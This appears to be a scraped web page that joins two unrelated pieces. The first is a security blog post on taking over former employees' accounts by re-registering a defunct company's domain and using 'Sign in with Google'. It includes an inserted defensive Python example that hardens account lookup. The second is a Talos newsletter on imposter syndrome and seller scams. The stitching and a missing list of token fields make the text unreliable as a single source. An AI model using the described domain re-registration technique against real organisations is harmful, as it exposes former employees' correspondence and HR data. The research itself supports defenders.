Just over a year ago, in our post entitled Google OAuth and phantom accounts, we discussed how using the “Sign in with Google” option for corporate services allows employees to create phantom Google accounts that aren’t controlled by the corporate Google Workspace admin, and continue to function after offboarding. Recently, it was discovered that this isn’t the only issue with OAuth. Due to weaknesses in this authentication mechanism, anyone can gain access to data of many defunct organizations by re-registering domains they abandoned. In this article, we explore this attack in more detail.
How authentication works with “Sign in with Google”
Some organizations may believe that “Sign in with Google” provides a reliable authentication mechanism backed by Google’s advanced technology and vast user monitoring capabilities. However, in reality, the Google OAuth authentication check is quite basic. It generally comes down to verifying that a user has access to an email address linked to an organization’s Google Workspace.
Moreover, as mentioned in our previous article on Google OAuth, this doesn’t necessarily have to be a Gmail address — Google accounts can be linked to any email address. Therefore, the security of accessing a corporate service via “Sign in with Google” is only as strong as the security of the email linked to the Google account.
Now let’s get into the details…
When authenticating a user in a corporate service, Google OAuth sends the following information to that service:
In theory, the Google OAuth ID token includes a unique parameter called sub for each Google account. However, in practice, due to issues with its usage, services often only check the domain and email address. Source
Google recommends that services use the sub parameter, claiming that this identifier is unique and constant for the user account — unlike an email address. But in reality, the sub parameter isn’t always constant; for a small number of users, it changes over time, which can cause authentication failures. As a result, services tend not to use it, and instead verify only the domain and email address — contrary to Google’s recommendations.
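To make the difference concrete, here is an added example (not code from the Kaspersky post or from Google) of the two ways a relying party can look up an account from ID token claims. The claims, the directory and the `sub` values are constructed; in a real service they would come from a token whose signature, issuer, audience and expiry had already been verified. The email-only lookup behaves the way the post describes, accepting any token for a matching address on the matching `hd` domain; the `sub`-keyed lookup binds the account to the identity that first linked it, so a freshly created Google account for the same address (assumed here to carry a different `sub`, consistent with the post's description of `sub` as per-account) does not inherit the old profile.

```python
"""Account lookup for a 'Sign in with Google' relying party.

Added example, not code from the Kaspersky post or from Google. Compares the
weak check the post describes (hosted domain + email) with a sub-keyed check.
All claims and directory entries are constructed.
"""
from dataclasses import dataclass


@dataclass
class Account:
    email: str
    hd: str            # hosted-domain claim of the Workspace that enrolled the user
    google_sub: str    # sub claim captured when the account was first linked
    display_name: str = ""


# Constructed user directory of a (now defunct) startup that used Google OAuth.
DIRECTORY = [
    Account("alice@example-startup.test", "example-startup.test", "sub-1001", "Alice"),
    Account("bob@example-startup.test", "example-startup.test", "sub-1002", "Bob"),
]


def login_by_email_only(claims: dict, directory=DIRECTORY):
    """Weak check: match on hd + email and ignore sub.

    Whoever controls the domain can mint the address and reach the profile."""
    for acct in directory:
        if acct.hd == claims.get("hd") and acct.email == claims.get("email"):
            return acct
    return None


def login_by_sub(claims: dict, directory=DIRECTORY):
    """Hardened check: an existing account only unlocks for the sub that linked it.

    A matching email with a different sub is treated as a new identity rather
    than as the former employee. The post notes that sub can change for a small
    number of users; that case needs an explicit re-verification path, not a
    silent fallback to email matching."""
    if not claims.get("email_verified", False):
        return None
    for acct in directory:
        if acct.email == claims.get("email"):
            return acct if acct.google_sub == claims.get("sub") else None
    return None


# Constructed claims: the real Alice, as issued while the company existed.
GENUINE_ALICE = {
    "iss": "https://accounts.google.com", "sub": "sub-1001",
    "email": "alice@example-startup.test", "email_verified": True,
    "hd": "example-startup.test",
}

# Constructed claims: the same address recreated under the re-registered
# domain. Assumed to be a new Google account, hence a different sub.
REREGISTERED_ALICE = {
    "iss": "https://accounts.google.com", "sub": "sub-9999",
    "email": "alice@example-startup.test", "email_verified": True,
    "hd": "example-startup.test",
}

if __name__ == "__main__":
    for label, claims in [("genuine", GENUINE_ALICE), ("re-registered", REREGISTERED_ALICE)]:
        weak = login_by_email_only(claims)
        strong = login_by_sub(claims)
        print(f"{label:14s} email-only -> {weak and weak.display_name!r:9} "
              f"sub-keyed -> {strong and strong.display_name!r}")
```

The design choice worth noting is that `login_by_sub` still uses the email address, but only to find the candidate record; the decision is made on `sub`. That keeps the lookup cheap while removing domain ownership from the trust decision, which is exactly the property the re-registered-domain attack relies on.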
“Sign in with Google” using an abandoned domain
Thus, an attacker can gain unauthorized access to a company’s services by simply having access to an email within that company’s domain. This is particularly easy to do if the company has ceased operations and abandoned its domain: anyone can register it for themselves.
The attacker can then create any email address under this domain, and use it to log into one of the services the company likely used. Some of these services may display a list of real users linked to the organization’s workspace — even if the address entered by the attacker was never actually used.
With this list — and complete control over all email addresses within the abandoned domain — the attacker can reconstruct the original Google Workspace of the defunct company. In this way, attackers can gain access to the profiles of former employees in services that used Google OAuth for authentication.
How serious a problem is this?
Dylan Ayrey, the researcher who discovered this Google OAuth vulnerability (and the previous issue with phantom accounts), aimed to demonstrate the severity of potential consequences. Using data from Crunchbase, Ayrey compiled a list of over 100,000 terminated startups whose domains are now up for sale.
Ayrey purchased one of these abandoned domains and tested the feasibility of the attack. Among the corporate services he managed to access using this vulnerability were Slack, Zoom, Notion, ChatGPT, and HR systems.
Thus, with this relatively simple attack requiring minimal resources, an attacker can gain access to a wealth of confidential information, ranging from employee correspondence and notes to personal data from HR systems.
According to Ayrey’s estimates, around 50% of startups use Google Workspace. If we suppose that the average defunct startup had about 10 employees, we could be talking about hundreds of thousands of people and millions of vulnerable accounts.
Who’s responsible, and what can be done?
Ayrey dutifully notified Google of this vulnerability through its bug bounty program. He also suggested a long-term solution: creating truly permanent and unique identifiers for Google accounts and Google Workspace. However, his report was initially rejected, with the comment “no fix needed” and labeled as “fraud or abuse”!
However, a few months after Ayrey presented his findings at a hacker conference (!) the report was reopened, and he was awarded $1337. Notably, he received the same minimal reward for his previous discovery of the phantom Google accounts vulnerability.
According to Ayrey, Google promised to fix the vulnerability in Google OAuth, but didn’t specify when or how exactly they plan to do this. Therefore, the problem with the “Sign in with Google” mechanism remains an unresolved issue, for which no one is willing to take responsibility. Potential victims of this attack include former employees of defunct companies who no longer have control over their accounts. Worse still, there’s no one to hold accountable for the security of these accounts anymore.
The wise move here would be for companies to take preventive measures in advance. However, very few startups seriously plan for their own demise — let alone what will happen afterward.
Fortunately, defending against this Google OAuth vulnerability is relatively straightforward. There are two non-mutually exclusive options:
Use a traditional login-and-password combo instead of “Sign in with Google”, and always enable two-factor authentication.
If your company ceases operations, don’t abandon workspaces in corporate services; delete them instead. This is quite easy to do; for example, here are the instructions for Slack and Notion.
Welcome to this week’s edition of the Threat Source newsletter.
Hello again my friends! Geez, it’s been a year am I right? Lemons it’s February you say?! Oof.
Imposter syndrome. You’ve heard the term I’m sure, but what is it? Basically: imposter syndrome is the persistent feeling of self-doubt and fear of being exposed as a fraud despite clear evidence of competence and success. In cybersecurity, and especially in Talos, you will find imposter syndrome in abundance.
In Talos you’re in rooms of incredibly bright and smart people. They are paragons of what it is to be hackers, and you cannot help but often admire the amazing quality of their work. It is truly an amazing team that does important work to help save the world from the bad guys.
The downside? You’re in a room of bright and smart people. Some can reverse malware binaries while juggling chainsaws. Some are polyglots who can at length tell you the linguistic nuances of Mesopotamian verbs and loanwords and have eidetic memory of every ransomware cartel ever. I personally know one who is an amazing, accredited musician and actually hacked a prison to open its jail cells on a pentest.
How do you not compare yourself to the talents, skills, and achievements of wonderfully smart and talented people? It’s tough not to. Comparison is truly the thief of joy.
The truth is – in cybersecurity and in places like Talos and elsewhere, you will be constantly assailing yourself with self-doubt of achievement and belonging. The anxiety, stress, and burnout from imposter syndrome are a real thing.
So what do we do? First, look at your achievements. You are where you are because others saw value in your work. Second, challenge those negative self-thoughts. Easier said than done, I know, but hear me out. Use mentors and peer group support to help challenge those negative self-thoughts.
And lastly, be kind to yourself. Cybersecurity is a hard gig. It’s a gigantic amount of technical and non-technical information and we all feel the pressure to absorb, understand, and master it and all its nuances. That’s not possible of course, but we cyber folks are wired differently. If you can walk away with 1% more information than you had yesterday, that’s a win. Take it. Just be kind to yourself, ok?
I want to take a moment to address a specific audience of readers. All the U.S. federal workers who have been affected by reduction in force (RIFs), my heart goes out to you. This is an unearned hardship. I wish I had a magic wand to wave to alleviate the stress and trauma of a sudden event like this. I know it’s truly awful. If I can offer any guidance or mentorship for private sector cybersecurity, reach out. I may not have all the answers, but I will do what I can. Stay strong.
The one big thing
Boy howdy is this a big one – scams! Look, the average person isn’t going to get smoked by Salt/Volt Typhoon, or wrestle with a financial threat actor like a ransomware cartel. But you absolutely have bought and sold things online. We break down seller abuse – that is, ways to trick sellers into being defrauded out of money. We always picture scams as the seller doing the defrauding, but the reverse is just as true.
Why do I care?
You want to keep money in your pocket, and not be the victim of a scam. The adversaries here know the systems they are manipulating quite well and have fine-tuned the art of fraud. It’s important to understand the seller experience as much as the buyer experience in order to understand these kinds of frauds and thefts.
So now what?
Understand the threat landscape for seller/buyer fraud, and hopefully this work can help keep money in your pocket and keep you from becoming a victim of theft. Pay attention to URLs you’re asked to click, and clever redirects to scamming websites. Now you know. And as G.I. Joe said – knowing is half the battle.
Top security headlines of the week
Sensitive financial and health data belonging to millions of veterans and stored on a benefits website is at risk of being stolen or otherwise compromised, according to a federal employee tasked with cybersecurity who was recently fired as part of massive government-wide cuts. (AP News)
Attackers are wielding a novel Linux backdoor against the education and public sectors in the US and Asia that demonstrates particularly stealthy ways to avoid both detection and deletion from a system. (Dark Reading)
Hackers claim to have published a trove of sensitive data belonging to IVF patients after a cyberattack on Genea, one of Australia’s largest fertility providers. (Tech Crunch)
A blueprint for protecting major events – Yuri Kramarz joins Talos Takes to discuss his experience in cybersecurity and threat hunting for some of the world’s biggest sporting events.
Sellers can get scammed too, and Joe goes off on a rant about imposter syndrome (admin, 2025-02-27)